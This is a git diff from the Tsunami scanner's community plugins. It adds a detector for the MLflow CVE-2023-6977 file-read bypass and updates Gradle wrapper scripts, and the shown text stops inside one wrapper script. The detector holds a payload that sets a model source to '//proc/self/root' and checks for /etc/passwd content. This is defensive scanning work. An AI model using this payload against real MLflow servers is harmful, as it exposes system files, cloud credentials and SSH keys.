'0.0.2-SNAPSHOT' repositories { diff --git a/community/detectors/mlflow_cve_2023_6977/gradle/wrapper/gradle-wrapper.jar b/community/detectors/mlflow_cve_2023_6977/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..d64cd4917 Binary files /dev/null and b/community/detectors/mlflow_cve_2023_6977/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/mlflow_cve_2023_6977/gradle/wrapper/gradle-wrapper.properties b/community/detectors/mlflow_cve_2023_6977/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6977/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/mlflow_cve_2023_6977/gradlew b/community/detectors/mlflow_cve_2023_6977/gradlew new file mode 100755 index 000000000..1aa94a426 --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6977/gradlew @@ -0,0 +1,249 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/mlflow_cve_2023_6977/gradlew.bat b/community/detectors/mlflow_cve_2023_6977/gradlew.bat new file mode 100644 index 000000000..93e3f59f1 --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6977/gradlew.bat @@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/mlflow_cve_2023_6977/settings.gradle b/community/detectors/mlflow_cve_2023_6977/settings.gradle new file mode 100644 index 000000000..cb07619ce --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6977/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'mlflow_cve_2023_6977' diff --git a/community/detectors/mlflow_cve_2023_1177/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177Detector.java b/community/detectors/mlflow_cve_2023_6977/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977Detector.java similarity index 86% rename from community/detectors/mlflow_cve_2023_1177/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177Detector.java rename to community/detectors/mlflow_cve_2023_6977/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977Detector.java index 275418731..88683af3b 100644 --- a/community/detectors/mlflow_cve_2023_1177/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177Detector.java +++ b/community/detectors/mlflow_cve_2023_6977/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977Detector.java @@ -1,5 +1,5 @@ /* - * Copyright 2021 Google LLC + * Copyright 2024 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. @@ -13,7 +13,7 @@ * See the License for the specific language governing permissions and * limitations under the License. */ -package com.google.tsunami.plugins.detectors.cves.cve20231177; +package com.google.tsunami.plugins.detectors.cves.cve20236977; import static com.google.common.base.Preconditions.checkNotNull; import static com.google.common.collect.ImmutableList.toImmutableList; @@ -50,15 +50,15 @@ import java.time.Instant; import javax.inject.Inject; -/** A {@link VulnDetector} that detects the CVE-2023-1177 vulnerability. */ +/** A {@link VulnDetector} that detects the CVE-2023-6977 vulnerability. */ @PluginInfo( type = PluginType.VULN_DETECTION, - name = "MLflow LFI/RFI CVE-2023-1177 Detector", - version = "0.1", - description = Cve20231177Detector.VULN_DESCRIPTION, - author = "hh-hunter", - bootstrapModule = Cve20231177DetectorBootstrapModule.class) -public final class Cve20231177Detector implements VulnDetector { + name = "MLflow LFI/RFI CVE-2023-6977 Detector", + version = "0.2", + description = Cve20236977Detector.VULN_DESCRIPTION, + author = "hh-hunter, frkngksl", + bootstrapModule = Cve20236977DetectorBootstrapModule.class) +public final class Cve20236977Detector implements VulnDetector { @VisibleForTesting static final String DETECTION_STRING = "root:x:0:0:root"; @VisibleForTesting static final String CREATE_DETECTION_STRING = "Tsunami-Test"; @@ -72,7 +72,9 @@ public final class Cve20231177Detector implements VulnDetector { + " host server, including any files stored in remote locations to which the host server" + " has access.This vulnerability can read arbitrary files. Since MLflow usually" + " configures s3 storage, it means that AWS account information can also be obtained," - + " and information such as local ssh private keys can also be read, resulting in RCE"; + + " and information such as local ssh private keys can also be read, resulting in RCE." + + " The vulnerability detected here is CVE-2023-6977 which is a bypass for both" + + " CVE-2023-1177 and CVE-2023-2780. Hence, this plugin encompasses them."; private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); @@ -88,14 +90,14 @@ public final class Cve20231177Detector implements VulnDetector { private static final String CREATE_MODEL_DATA = "{\"name\":\"REPLACE_FLAG\"}"; private static final String UPDATE_CREATE_MODEL_DATA = - "{\"name\":\"REPLACE_FLAG\",\"source\":\"file:///\"}"; + "{\"name\":\"REPLACE_FLAG\",\"source\":\"//proc/self/root\"}"; private final HttpClient httpClient; private final Clock utcClock; @Inject - Cve20231177Detector(@UtcClock Clock utcClock, HttpClient httpClient) { + Cve20236977Detector(@UtcClock Clock utcClock, HttpClient httpClient) { this.httpClient = checkNotNull(httpClient); this.utcClock = checkNotNull(utcClock); } @@ -103,7 +105,7 @@ public final class Cve20231177Detector implements VulnDetector { @Override public DetectionReportList detect( TargetInfo targetInfo, ImmutableList matchedServices) { - logger.atInfo().log("CVE-2023-1177 starts detecting."); + logger.atInfo().log("CVE-2023-6977 starts detecting."); return DetectionReportList.newBuilder() .addAllDetectionReports( @@ -219,11 +221,18 @@ private DetectionReport buildDetectionReport( .setMainId( VulnerabilityId.newBuilder() .setPublisher("TSUNAMI_COMMUNITY") - .setValue("CVE_2023_1177")) + .setValue("CVE_2023_6977")) + .addRelatedId( + VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2023-6977")) + .addRelatedId( + VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2023-2780")) + .addRelatedId( + VulnerabilityId.newBuilder().setPublisher("CVE").setValue("CVE-2023-1177")) .setSeverity(Severity.CRITICAL) - .setTitle("CVE-2023-1177 MLflow LFI/RFI") + .setTitle("CVE-2023-6977 MLflow LFI/RFI") .setRecommendation( - "1.Updated to version 2.2.1 or later\n2.Add authentication to MLflow server\n") + "1.Update to the version 2.10.0 or above\n" + + "2.Add authentication to MLflow server\n") .setDescription(VULN_DESCRIPTION)) .build(); } diff --git a/community/detectors/mlflow_cve_2023_6977/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977DetectorBootstrapModule.java b/community/detectors/mlflow_cve_2023_6977/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977DetectorBootstrapModule.java new file mode 100644 index 000000000..36402681d --- /dev/null +++ b/community/detectors/mlflow_cve_2023_6977/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977DetectorBootstrapModule.java @@ -0,0 +1,27 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve20236977; + +import com.google.tsunami.plugin.PluginBootstrapModule; + +/** An CVE-2023-6977 Guice module that bootstraps the {@link Cve20236977Detector}. */ +public final class Cve20236977DetectorBootstrapModule extends PluginBootstrapModule { + + @Override + protected void configurePlugin() { + registerPlugin(Cve20236977Detector.class); + } +} diff --git a/community/detectors/mlflow_cve_2023_1177/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177DetectorTest.java b/community/detectors/mlflow_cve_2023_6977/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977DetectorTest.java similarity index 76% rename from community/detectors/mlflow_cve_2023_1177/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177DetectorTest.java rename to community/detectors/mlflow_cve_2023_6977/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977DetectorTest.java index d61391c3f..7190b1eb0 100644 --- a/community/detectors/mlflow_cve_2023_1177/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20231177/Cve20231177DetectorTest.java +++ b/community/detectors/mlflow_cve_2023_6977/src/test/java/com/google/tsunami/plugins/detectors/cves/cve20236977/Cve20236977DetectorTest.java @@ -1,5 +1,5 @@ /* - * Copyright 2021 Google LLC + * Copyright 2024 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. @@ -13,14 +13,14 @@ * See the License for the specific language governing permissions and * limitations under the License. */ -package com.google.tsunami.plugins.detectors.cves.cve20231177; +package com.google.tsunami.plugins.detectors.cves.cve20236977; import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; -import static com.google.tsunami.plugins.detectors.cves.cve20231177.Cve20231177Detector.CREATE_DETECTION_STRING; -import static com.google.tsunami.plugins.detectors.cves.cve20231177.Cve20231177Detector.DETECTION_STRING; -import static com.google.tsunami.plugins.detectors.cves.cve20231177.Cve20231177Detector.VULN_DESCRIPTION; +import static com.google.tsunami.plugins.detectors.cves.cve20236977.Cve20236977Detector.CREATE_DETECTION_STRING; +import static com.google.tsunami.plugins.detectors.cves.cve20236977.Cve20236977Detector.DETECTION_STRING; +import static com.google.tsunami.plugins.detectors.cves.cve20236977.Cve20236977Detector.VULN_DESCRIPTION; import com.google.common.collect.ImmutableList; import com.google.inject.Guice; @@ -49,14 +49,14 @@ import org.junit.runner.RunWith; import org.junit.runners.JUnit4; -/** Unit tests for {@link Cve20231177Detector}. */ +/** Unit tests for {@link Cve20236977Detector}. */ @RunWith(JUnit4.class) -public final class Cve20231177DetectorTest { +public final class Cve20236977DetectorTest { private final FakeUtcClock fakeUtcClock = FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); - @Inject private Cve20231177Detector detector; + @Inject private Cve20236977Detector detector; private MockWebServer mockWebServer; @@ -65,7 +65,7 @@ public void setUp() { mockWebServer = new MockWebServer(); Guice.createInjector( new FakeUtcClockModule(fakeUtcClock), - new Cve20231177DetectorBootstrapModule(), + new Cve20236977DetectorBootstrapModule(), new HttpClientModule.Builder().build()) .injectMembers(this); } @@ -106,12 +106,24 @@ public void detect_whenVulnerable_returnsVulnerability() throws IOException { .setMainId( VulnerabilityId.newBuilder() .setPublisher("TSUNAMI_COMMUNITY") - .setValue("CVE_2023_1177")) + .setValue("CVE_2023_6977")) + .addRelatedId( + VulnerabilityId.newBuilder() + .setPublisher("CVE") + .setValue("CVE-2023-6977")) + .addRelatedId( + VulnerabilityId.newBuilder() + .setPublisher("CVE") + .setValue("CVE-2023-2780")) + .addRelatedId( + VulnerabilityId.newBuilder() + .setPublisher("CVE") + .setValue("CVE-2023-1177")) .setSeverity(Severity.CRITICAL) - .setTitle("CVE-2023-1177 MLflow LFI/RFI") + .setTitle("CVE-2023-6977 MLflow LFI/RFI") .setRecommendation( - "1.Updated to version 2.2.1 or later\n2.Add authentication to MLflow " - + "server\n") + "1.Update to the version 2.10.0 or above\n" + + "2.Add authentication to MLflow server\n") .setDescription(VULN_DESCRIPTION)) .build()); } @@ -141,6 +153,7 @@ private void mockWebResponse(String body) throws IOException { mockWebServer.enqueue(new MockResponse().setResponseCode(200).setBody(CREATE_DETECTION_STRING)); mockWebServer.enqueue(new MockResponse().setResponseCode(200).setBody(CREATE_DETECTION_STRING)); mockWebServer.enqueue(new MockResponse().setResponseCode(200).setBody(body)); + mockWebServer.enqueue(new MockResponse().setResponseCode(200)); mockWebServer.start(); } } diff --git a/community/detectors/nacos_cve_2021_29441/gradle/wrapper/gradle-wrapper.jar b/community/detectors/nacos_cve_2021_29441/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/nacos_cve_2021_29441/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/nacos_cve_2021_29441/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/nacos_cve_2021_29441/gradle/wrapper/gradle-wrapper.properties b/community/detectors/nacos_cve_2021_29441/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/nacos_cve_2021_29441/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/nacos_cve_2021_29441/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/nacos_cve_2021_29441/gradlew b/community/detectors/nacos_cve_2021_29441/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/nacos_cve_2021_29441/gradlew +++ b/community/detectors/nacos_cve_2021_29441/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - 